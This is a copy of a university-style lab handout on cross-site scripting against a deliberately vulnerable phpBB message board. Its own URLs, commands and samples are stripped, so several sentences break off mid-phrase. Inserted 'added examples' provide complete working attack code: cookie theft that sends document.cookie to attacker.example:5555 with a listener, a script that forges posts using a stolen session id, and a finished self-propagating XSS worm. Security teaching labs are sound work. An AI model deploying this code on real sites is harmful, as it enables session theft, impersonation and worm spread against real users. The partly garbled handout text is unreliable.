Cross-Site Scripting (XSS) Attack Lab
Sunday, 1 July 2018
Cross-site scripting (XSS) is a type of vulnerability commonly found in web applications. This vulnerability makes it possible for attackers to inject malicious code (e.g. JavaScript programs) into the victim's web browser. Using this malicious code, the attackers can steal the victim's credentials, such as cookies. The access control policies (i.e., the same origin policy) employed by the browser to protect those credentials can be bypassed by exploiting the XSS vulnerability, because the injected script runs with the origin of the vulnerable site itself. Vulnerabilities of this kind can potentially lead to large-scale attacks. To demonstrate what attackers can do by exploiting XSS vulnerabilities, we have set up a web-based message board using phpBB. We modified the software to introduce an XSS vulnerability in this message board; this vulnerability allows users to post any arbitrary message to the board, including JavaScript programs. Students need to exploit this vulnerability by posting some malicious messages to the message board; users who view these malicious messages will become victims. The attackers' goal is to post forged messages on behalf of the victims.
2 Lab Environment
In this lab, we will need three things: (1) the Firefox web browser, (2) the Apache web server, and (3) the phpBB message board web application. For the browser, we need to use the LiveHTTPHeaders extension for Firefox to inspect the HTTP requests and responses. The pre-built Ubuntu VM image provided to you already has the Firefox web browser with the required extensions installed.
Starting the Apache Server. The Apache web server is also included in the pre-built Ubuntu image. However, the web server is not started by default. You have to first start the web server using one of the following two commands:
The phpBB Web Application. The phpBB web application is already set up in the pre-built Ubuntu VM image. We have also created several user accounts in the phpBB server. The password information can be obtained from the posts on the front page. You can access the phpBB server using the following URL (the Apache server needs to be started first):
Configuring DNS. This URL is only accessible from inside the virtual machine, because we have modified the /etc/hosts file to map the domain name ( to the virtual machine's local IP address (. You may map any domain name to a particular IP address using /etc/hosts. For example, you can map to the local IP address by appending the following entry to the /etc/hosts file:
Therefore, if your web server and browser are running on two different machines, you need to modify the /etc/hosts file on the browser’s machine accordingly to map to the web server’s IP address.
Configuring Apache Server. In the pre-built VM image, we use the Apache server to host all the web sites used in the lab. The name-based virtual hosting feature in Apache can be used to host several web sites (or URLs) on the same machine. A configuration file named default in the directory /etc/apache2/sites-available contains the necessary directives for the configuration:
1. The directive "NameVirtualHost *" instructs the web server to use all IP addresses in the machine (some machines may have multiple IP addresses).
2. Each web site has a VirtualHost block that specifies the URL for the web site and directory in the file system that contains the sources for the web site. For example, to configure a web site with URL with sources in directory /var/www/Example_1/, and to configure a web site with URL with sources in directory /var/www/Example_2/, we use the following blocks
You may modify the web application by accessing the source in the mentioned directories. For example, with the above configuration, the web application can be changed by modifying the sources in the directory /var/www/Example_1/.
Other software. Some of the lab tasks require some basic familiarity with JavaScript. Wherever necessary, we provide a sample JavaScript program to help the students get started. To complete Task 3, students may need a utility to watch incoming requests on a particular TCP port. We provide a C program that can be configured to listen on a particular port and display incoming messages. The C program can be downloaded from the web site for this lab.
Note for Instructors. This lab may be conducted in a supervised lab environment. In such a case, the instructor may provide the following background information to the students prior to doing the lab:
1. How to use the virtual machine, the Firefox web browser, and the LiveHTTPHeaders extension.
2. Basics of JavaScript and the XMLHttpRequest object.
3. A brief overview of the tasks.
4. How to use the C program that listens on a port.
5. How to write a Java program to send an HTTP POST message.
3 Lab Tasks
3.1 Task 1: Posting a Malicious Message to Display an Alert Window
The objective of this task is to post a malicious message that contains JavaScript to display an alert window. The JavaScript should be provided along with the user comments in the message. The following JavaScript will display an alert window:
If you post this JavaScript along with your comments in the message board, then any user who views this comment will see the alert window.
3.2 Task 2: Posting a Malicious Message to Display Cookies
The objective of this task is to post a malicious message on the message board containing JavaScript code, such that whenever a user views this message, the user's cookies will be printed out. For instance, consider the following message that contains JavaScript code:
When a user views this message post, he/she will see a pop-up message box that displays the cookies of the user.
3.3 Task 3: Stealing Cookies from the Victim's Machine
In the previous task, the malicious JavaScript code can print out the user's cookies; in this task, the attacker wants the JavaScript code to send the cookies to himself/herself. To achieve this, the malicious JavaScript code can send an HTTP request to the attacker, with the cookies appended to the request. We can do this by having the malicious JavaScript insert an <img> tag with src set to the URL of the attacker's destination. When the JavaScript inserts the img tag, the browser tries to load the image from the mentioned URL and in the process ends up sending an HTTP GET request to the attacker's web site. Unlike XMLHttpRequest, loading an image from another origin is permitted by the same-origin policy, which restricts reading cross-origin responses rather than sending such requests. The JavaScript given below sends the cookies to port 5555 on the attacker's machine. On that port, the attacker has a TCP server that simply prints out the request it receives. The TCP server program will be given to you (available on the web site of this lab).
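The Task 3 payload written out, plus a small Node.js stand-in for the lab's C port listener (which is not reproduced on this page). This is an added example, not the handout's code: the port 5555 comes from the handout, while the host name ATTACKER_HOST is a placeholder that must be replaced with the attacker machine's address. The `doc` parameter is normally `document`; it is passed in so the function can be exercised outside a browser.

```javascript
// Added example (not part of the original lab handout): Task 3 cookie
// exfiltration via an injected <img>, plus a Node.js stand-in for the
// lab's C listener. ATTACKER_HOST is a placeholder, not a lab host name.

const ATTACKER_HOST = 'attacker.example'; // placeholder, replace before use
const ATTACKER_PORT = 5555;               // port named in the handout

// Build the URL the victim's browser will fetch. The cookie string is
// percent-encoded so that ';', '=', '%' and spaces survive as query data.
function buildExfilUrl(cookieString, host, port) {
  return 'http://' + host + ':' + port + '/?c=' + encodeURIComponent(cookieString);
}

// Inject a 1x1 <img> whose src points at the attacker. The browser issues
// the GET automatically, carrying document.cookie in the query string.
// Returns the element that was inserted.
function stealCookie(doc, host, port) {
  const img = doc.createElement('img');
  img.src = buildExfilUrl(doc.cookie, host, port);
  img.width = 1;
  img.height = 1;
  doc.body.appendChild(img);
  return img;
}

// Stand-in for the lab's C listener: print every incoming request and
// answer with an empty 200 so the victim's browser does not retry.
function startListener(port) {
  const net = require('net');
  const server = net.createServer((sock) => {
    sock.on('error', () => {});
    sock.on('data', (chunk) => {
      process.stdout.write(chunk.toString());
      sock.end('HTTP/1.1 200 OK\r\nContent-Length: 0\r\nConnection: close\r\n\r\n');
    });
  });
  server.listen(port, () => console.log('listening on port ' + port));
  return server;
}

// In the browser (posted on one line inside <script>...</script>):
//   stealCookie(document, ATTACKER_HOST, ATTACKER_PORT);
// On the attacker machine: node thisfile.js --listen
if (typeof process !== 'undefined' && process.argv.indexOf('--listen') !== -1) {
  startListener(ATTACKER_PORT);
}
```

The request that arrives at the listener is a plain GET whose query string holds the victim's cookies; a Referer header added by the browser also reveals which page carried the payload.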
3.4 Task 4: Impersonating the Victim using the Stolen Cookies
After stealing the victim's cookies, the attacker can do whatever the victim can do on the phpBB web server, including posting a new message in the victim's name, deleting the victim's posts, etc. In this task, we will write a program to forge a message post on behalf of the victim. To forge a message post, we should first analyze how phpBB works in terms of posting messages. More specifically, our goal is to figure out what is sent to the server when a user posts a message. Firefox's LiveHTTPHeaders extension can help us; it can display the contents of any HTTP request message sent from the browser. From the contents, we can identify all the parameters of the message. A screenshot of LiveHTTPHeaders is given in Figure 1. The LiveHTTPHeaders extension can be downloaded from, and it is already installed in the pre-built Ubuntu VM image. Once we have understood what the HTTP request for message posting looks like, we can write a Java program to send out the same HTTP request. The phpBB server cannot distinguish whether the request is sent out by the user's browser or by the attacker's Java program. As long as we set all the parameters correctly, the server will accept and process the message-posting HTTP request. To simplify your task, we provide you with a sample Java program that does the following:
1. Opens a connection to web server.
2. Sets the necessary HTTP header information.
3. Sends the request to web server.
4. Gets the response from web server.
If you have trouble understanding the above program, we suggest that you read the following: • JDK 6 Documentation: • Java Protocol Handler:
Limitation: The forged message post should be generated from the same virtual machine, i.e. the victim (the user connected to the web forum) and the attacker (the one who generates the forged message post) should be on the same machine, because phpBB uses the IP address as well as the cookies for session management. If the attacker generates the forged message post from a different machine, the source IP address of the forged request and the victim's IP address would differ, and hence the forged message post would be rejected by the phpBB server, despite the fact that the forged message carries the correct cookie information.
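The same forged post as a Node.js script, as an added example; the handout ships a Java program, which is not reproduced on this page. Everything that is not stated on the page is an assumption to be confirmed against your own LiveHTTPHeaders capture: the forum host name FORUM_HOST (the name mapped in /etc/hosts), the posting path POST_PATH, and the form field names mode, f, subject, message, sid and post. The two places where the session id must appear (the Cookie header and the body) are the ones the handout describes.

```javascript
// Added example (not the handout's Java program): Task 4 forged post in
// Node.js. Host, path and field names are assumptions; verify them with
// LiveHTTPHeaders before use. Run from the same VM as the victim (see the
// Limitation above: phpBB binds the session to the client IP).

const FORUM_HOST = 'forum.lab';          // placeholder: the name in /etc/hosts
const FORUM_PORT = 80;
const POST_PATH = '/phpBB2/posting.php'; // assumed phpBB2 posting script
const COOKIE_NAME = 'phpbb2mysql_sid';   // session cookie named in the handout

// application/x-www-form-urlencoded body. encodeURIComponent turns a
// space into %20 and '+' into %2B, so the payload is unambiguous.
function formEncode(params) {
  return Object.keys(params)
    .map((k) => encodeURIComponent(k) + '=' + encodeURIComponent(params[k]))
    .join('&');
}

// Assemble the complete request from a stolen session id. The sid appears
// twice, exactly as in a genuine post: in the Cookie header (session) and
// in the body (phpBB's anti-CSRF check).
function buildForgedPost(sid, forumId, subject, message) {
  const body = formEncode({
    mode: 'newtopic',      // assumed field name
    f: String(forumId),    // assumed: target forum id
    subject: subject,
    message: message,
    sid: sid,
    post: 'Submit',        // assumed: the submit button's name/value
  });
  return {
    method: 'POST',
    path: POST_PATH,
    headers: {
      'Host': FORUM_HOST,
      'Cookie': COOKIE_NAME + '=' + sid,
      'Content-Type': 'application/x-www-form-urlencoded',
      'Content-Length': String(Buffer.byteLength(body)),
    },
    body: body,
  };
}

// Send the request and hand the status code and response body to `done`.
function sendForgedPost(req, done) {
  const http = require('http');
  const r = http.request(
    { host: FORUM_HOST, port: FORUM_PORT, method: req.method, path: req.path, headers: req.headers },
    (res) => {
      let data = '';
      res.on('data', (c) => { data += c; });
      res.on('end', () => done(res.statusCode, data));
    }
  );
  r.on('error', (e) => done(null, e.message));
  r.end(req.body);
}

// Usage: node forge.js --send <stolen sid>
if (typeof process !== 'undefined' && process.argv.indexOf('--send') !== -1) {
  const sid = process.argv[process.argv.indexOf('--send') + 1];
  const req = buildForgedPost(sid, 1, 'Forged subject', 'Posted with a stolen session id');
  sendForgedPost(req, (status, text) => console.log(status, String(text).slice(0, 200)));
}
```

A 200 response does not by itself mean the post was accepted; phpBB returns its error pages with status 200 too, so check the forum (or the response body) for the new message.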
3.5 Task 5: Writing an XSS Worm
In the previous task, we have learned how to steal the cookies from the victim and then forge HTTP requests using the stolen cookies. In this task, we need to write a malicious JavaScript to forge an HTTP request directly from the victim's browser. This attack does not require any intervention from the attacker. JavaScript that can achieve this is called a cross-site scripting worm. For this web application, the worm program should do the following:
1. Retrieve the session ID of the user using JavaScript.
2. Forge an HTTP POST request to post a message using the session ID.
There are two common types of HTTP requests, the HTTP GET request and the HTTP POST request. These two types of HTTP requests differ in how they send the contents of the request to the server. In phpBB, the request for posting a message uses an HTTP POST request. We can use the XMLHttpRequest object to send HTTP GET and POST requests for web applications. XMLHttpRequest can only send HTTP requests back to the server the page came from, not to other computers, because the same-origin policy is strictly enforced for XMLHttpRequest. This is not an issue for us, because we do want to use XMLHttpRequest to send a forged HTTP POST request back to the phpBB server. To learn how to use XMLHttpRequest, you can study the cited documents [1, 2]. If you are not familiar with JavaScript programming, we suggest that you read [3] to learn some basic JavaScript functions. You will have to use some of these functions: You may also need to debug your JavaScript code. Firebug is a Firefox extension that helps you debug JavaScript code. It can point you to the precise places that contain errors. Firebug can be downloaded from It is already installed in our pre-built Ubuntu VM image.
Code Skeleton. We provide a skeleton of the JavaScript code that you need to write. You need to fill in all the necessary details. When you include the final JavaScript code in the message posted to the phpBB message board, you need to remove all the comments, extra space, and new-line characters.
To make our worm work, we should pay attention to how the session id information is used by phpBB. From the output of the LiveHTTPHeaders extension, we can notice that sid appears twice in the message-posting request. One is in the cookie section (it is called phpbb2mysql_sid). Therefore, the HTTP POST request sent out by XMLHttpRequest must also include the cookie; we already did this for you in the above skeleton code. If we look carefully at the LiveHTTPHeaders output, we can see that the same session id also appears in the request body, on the line that starts with "subject=". The phpBB server uses the session id here to prevent another type of attack (the cross-site request forgery attack). In our forged message-posting request, we also need to add this session id information; the value of this session id is exactly the same as that in phpbb2mysql_sid. Without this session id in the request body, the request will be discarded by the server. In order to retrieve the sid information from the cookie, you may need to learn some string operations in JavaScript. You should study the cited tutorial [4].
3.6 Task 6: Writing a Self-Propagating XSS Worm
The worm built in the previous task only forges a message on behalf of the victims; it does not propagate itself. Therefore, technically speaking, it is not a worm. To be able to propagate itself, the forged message should also include the worm, so whenever somebody clicks on the forged message, a new forged message that carries the same worm will be created. This way, the worm can propagate. The more people click on the forged messages, the faster the worm propagates. In this task, you need to expand what you did in Task 5, and add a copy of the worm to the body of the forged message. The following guidelines will help you with the task:
1. The JavaScript program that posts the forged message is already part of the web page. Therefore, the worm code can use DOM APIs to retrieve a copy of itself from the web page. An example of using DOM APIs is given below. This code gets a copy of itself and displays it in an alert window:
2. URL Encoding: Form data submitted over HTTP is URL-encoded (application/x-www-form-urlencoded), which replaces characters that cannot appear literally in the request, such as spaces, "&", "=" and non-ASCII characters, with special codes under the URL encoding scheme. In the worm code, messages to be posted to the phpBB forum should therefore be URL-encoded. The escape function can be used to URL-encode a string. An example of using the escape function is given below:
3. Under the URL encoding scheme the "+" symbol is used to denote a space, and the escape function leaves "+" unencoded, so a "+" inside the posted worm body would be turned into a space by the server and break the copied code. In JavaScript programs, "+" is used for both arithmetic operations and string concatenation. To avoid this ambiguity, you may use the concat function for string concatenation and avoid using addition. For the worm code in this exercise, you do not have to use additions. If you do have to add a number (e.g. a+5), you can use subtraction instead (e.g. a-(-5)).
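A complete Task 5/6 worm, as an added example; it is not the handout's skeleton (which is not reproduced on this page), and the pieces that do not touch the network are separate functions so they can be checked outside a browser. Assumptions: the posting path POST_PATH and the field names mode, f, subject, message, sid and post as seen in LiveHTTPHeaders, and that the posted <script> tag carries id="worm" so the code can find its own source. It departs from guideline 2 in one respect: it uses encodeURIComponent instead of escape, which encodes "+" as %2B, so the concat/subtraction workaround of guideline 3 is not needed. As the handout says, strip the comments and newlines before posting, since a "//" comment would swallow the rest of a one-line payload.

```javascript
// Added example (not the handout's skeleton): Task 5/6 XSS worm.
// POST_PATH and the form field names are assumptions; verify them with
// LiveHTTPHeaders. Strip comments and newlines before posting.

var POST_PATH = '/phpBB2/posting.php'; // assumed phpBB2 posting script
var WORM_ID = 'worm';                   // id given to the <script> tag we post

// Task 5 step 1: pull phpbb2mysql_sid out of document.cookie ("k=v; k2=v2").
function getSid(cookieString) {
  var parts = cookieString.split(';');
  for (var i = 0; i < parts.length; i++) {
    var kv = parts[i].trim().split('=');
    if (kv[0] === 'phpbb2mysql_sid') return kv.slice(1).join('=');
  }
  return null;
}

// Task 6 guideline 1: the DOM hands us our own source text.
function getOwnSource(doc) {
  var el = doc.getElementById(WORM_ID);
  return el ? el.innerHTML : '';
}

// Body of the forged post: visible text plus a fresh copy of the worm.
// encodeURIComponent emits %2B for '+', so the copied code survives the
// server-side decode intact (escape would leave '+' to become a space).
// '<\/script>' keeps a literal </script> out of our own source text.
function buildWormBody(sid, forumId, selfSource) {
  var wormTag = '<script id="' + WORM_ID + '">' + selfSource + '<\/script>';
  var message = 'You have been hacked. ' + wormTag;
  return 'mode=newtopic&f=' + encodeURIComponent(String(forumId)) +
    '&subject=' + encodeURIComponent('Hello') +
    '&message=' + encodeURIComponent(message) +
    '&sid=' + encodeURIComponent(sid) +
    '&post=Submit';
}

// Task 5 step 2: send the forged POST from the victim's own browser.
// XMLHttpRequest is same-origin only, which is exactly what we need; the
// browser attaches the phpbb2mysql_sid cookie itself. XhrCtor is normally
// XMLHttpRequest and is passed in so the function can be tested with a fake.
// Returns the body that was sent, or null if no session cookie was found.
function propagate(doc, XhrCtor, forumId) {
  var sid = getSid(doc.cookie);
  if (!sid) return null;
  var body = buildWormBody(sid, forumId, getOwnSource(doc));
  var xhr = new XhrCtor();
  xhr.open('POST', POST_PATH, true);
  xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  xhr.send(body);
  return body;
}

// In the browser the whole file is posted on one line as
// <script id="worm"> ... </script>; this call fires on every view.
if (typeof document !== 'undefined' && typeof XMLHttpRequest !== 'undefined') {
  propagate(document, XMLHttpRequest, 1);
}
```

Every viewer of the forged post therefore creates another forged post carrying the same code; the only condition is a valid phpbb2mysql_sid cookie, i.e. a logged-in victim.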
4 Submission
You need to submit a detailed lab report describing what you have done and what you have observed. Please provide details using LiveHTTPHeaders, Wireshark, and/or screenshots. You also need to provide explanations of the observations that are interesting or surprising.
[1] AJAX for n00bs. Available at the following URL:
[2] AJAX POST-It Notes. Available at the following URL:
[3] Essential Javascript – A Javascript Tutorial. Available at the following URL:
[4] The Complete Javascript Strings Reference. Available at the following URL: